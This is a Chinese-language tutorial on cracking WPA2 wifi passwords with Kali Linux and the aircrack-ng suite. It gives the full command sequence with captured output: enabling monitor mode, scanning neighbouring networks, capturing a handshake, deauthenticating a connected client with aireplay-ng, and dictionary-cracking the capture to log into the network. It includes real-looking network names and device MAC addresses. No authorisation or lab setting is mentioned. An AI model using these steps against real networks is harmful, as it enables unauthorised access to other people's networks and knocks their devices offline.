如何破解wifi密码？

前期准备：

　　kali 系统

　　外置无线网卡

破解过程：

　　首先，需要登录kali系统，可以是虚拟机。

　　在虚拟机中设置点击 虚拟机-可移动设备-无线网卡的名称，将无线网卡绑定到kali虚拟机上。

　　在kali中切换到root账户：sudo su root

　　使用命令：ifconfig 查看无线网卡是否正常接入：一般会回显wlan0，记住这个wlan0 网卡名称

┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 00:0c:29:4f:04:de  txqueuelen 1000  (Ethernet)
        RX packets 5401114  bytes 708741419 (675.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4868778  bytes 457372067 (436.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 37851  bytes 14126452 (13.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 37851  bytes 14126452 (13.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 06:8a:73:6a:51:48  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

　　使用命令：airmon-ng 查看网卡是否支持监听功能：有回显说明支持监听功能。

┌──(rootkali)-[/home/kali/Desktop]
└─# airmon-ng                                                        

PHY     Interface       Driver          Chipset

phy4    wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070

　　使用命令：airmon-ng start wlan0 激活无线网卡的监听模式

┌──(rootkali)-[/home/kali/Desktop]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    531 NetworkManager
 969681 wpa_supplicant

PHY     Interface       Driver          Chipset

phy4    wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070
                (mac80211 monitor mode vif enabled for [phy4]wlan0 on [phy4]wlan0mon)
                (mac80211 station mode vif disabled for [phy4]wlan0)

　　返回enabled说明已经激活，这时使用ifconfig命令再次查看无线网卡，可能会发现无线网卡名称变为wlan0mon

┌──(rootkali)-[/home/kali/Desktop]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 00:0c:29:4f:04:de  txqueuelen 1000  (Ethernet)
        RX packets 5401114  bytes 708741419 (675.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4868778  bytes 457372067 (436.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 37851  bytes 14126452 (13.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 37851  bytes 14126452 (13.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec C8-3A-35-CE-82-22-00-8C-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

　　使用命令：airodump-ng wlan0mon 扫描当前周边环境的WiFi信号，这里的wlan0mon是当前无线网卡的网卡名称，具体名称需要自行更换。如何扫不出来，请插拔一下无线网卡，再次使用命

　　令：airmon-ng start wlan0以及airodump-ng wlan0mon。

CH  5 ][ Elapsed: 6 s ][ 2023-01-20 21:23                                                                                             

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                       

 5A:41:20:A3:5E:D9  -70        2        0    0   1  540   WPA2 CCMP   PSK  <length:  0>
 74:85:C4:5A:8E:2D  -56        2        0    0   6  270   WPA2 CCMP   PSK  scivous
 D6:B7:09:B2:D5:4E  -65        4        0    0   3  360   WPA2 CCMP   PSK  <length:  0>
 50:78:B3:61:04:60  -67        2        0    0   4  130   WPA2 CCMP   PSK  ChinaNet-x5cZ
 48:73:97:01:2C:46  -64        2        0    0   9  130   OPN              <length:  0>
 C8:6C:20:46:E6:AC  -72        2        0    0   4  130   WPA2 CCMP   PSK  ChinaNet-5Zzh
 48:73:97:01:2C:47  -73        2        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-2.4G-2C45
 F0:55:01:F3:EF:75  -75        2        0    0  11  360   WPA2 CCMP   PSK  ChinaNet-G64JFP_Wi-Fi5                                                                                        

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                     

 (not associated)   34:EA:34:9C:A1:F9  -74    0 - 1     15        2         ChinaNet-q97E
 C8:3A:35:06:11:08  16:1E:8A:6F:A0:15   -1   11e- 0      0        3
Quitting...                                                                             

　　找到需要破解的wifi名称ESSID这一栏：比如scivous，记录这个mac地址（74:85:C4:5A:8E:2D）以及CH号（6）。CH表示无线网络信道，BSSID表示无线 AP 的硬件地址。

　　找到之后，即可CRTL+D结束运行。

　　下面开始抓包：

　　使用命令：airodump-ng -c 6 --bssid 74:85:C4:5A:8E:2D -w /home/kali/Desktop/data wlan0mon

　　这里的6是指CH号，bssid是指bssid号，-w后面写入要保存的文件地址以及对应的文件名称，wlan0mon是指网卡名称。

 CH  6 ][ Elapsed: 6 s ][ 2023-01-20 21:41                                                                                             

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                   

 74:85:C4:5A:8E:2D  -66  38       48       85   15   6  270   WPA2 CCMP   PSK  H3C_1703                                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                     

 74:85:C4:5A:8E:2D  E4:93:6A:CB:87:39  -46    0 - 1e  1114       22
 74:85:C4:5A:8E:2D  64:61:40:F4:47:6D  -48    1e- 1e  1430       74 

　　出现这个界面，说明已经开始抓包了。如果没有出现，继续插拔无线网卡，按照之前的操作在来一遍。

　　抓包过程可能比较慢，这时可以进行ack攻击，加快抓包进程，这时不要关闭抓包，打开新的terminal，使用命令：

　　aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon

　　这里的10代表攻击10次，-a为bssid号，-c为station号（用户硬件设备地址）。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon                                                      1 ⨯
[sudo] password for kali:
21:50:17  Waiting for beacon frame (BSSID: 74:85:C4:5A:8E:2D) on channel 6
21:50:18  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [24|49 ACKs]
21:50:18  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [47|31 ACKs]
21:50:19  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [11|40 ACKs]
21:50:20  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 8|45 ACKs]
21:50:20  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 5|38 ACKs]

　　查看抓包界面， CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41后面是否出现][ WPA handshake: 74:85:C4:5A:8E:2D，这时，就代表已经抓到了包，在相应的位置会新生成5个文件，找到cap结尾的

　　文件：

　　

暴力破解：

　　使用wifi字典对data-01.cap进行hash暴力破解：这里的破解可以离线破解了，不需要联网。

　　使用命令：aircrack-ng -w /home/kali/Desktop/password.txt -b 74:85:C4:5A:8E:2D /home/kali/Desktop/data-01.cap

　　字典文件可以参考：https://github.com/conwnet/wpa-dictionary，https://www.freedidi.com/2503.html，也可以自己自行收集。

　　破解成功之后，使用相应的密码，登录wifi即可。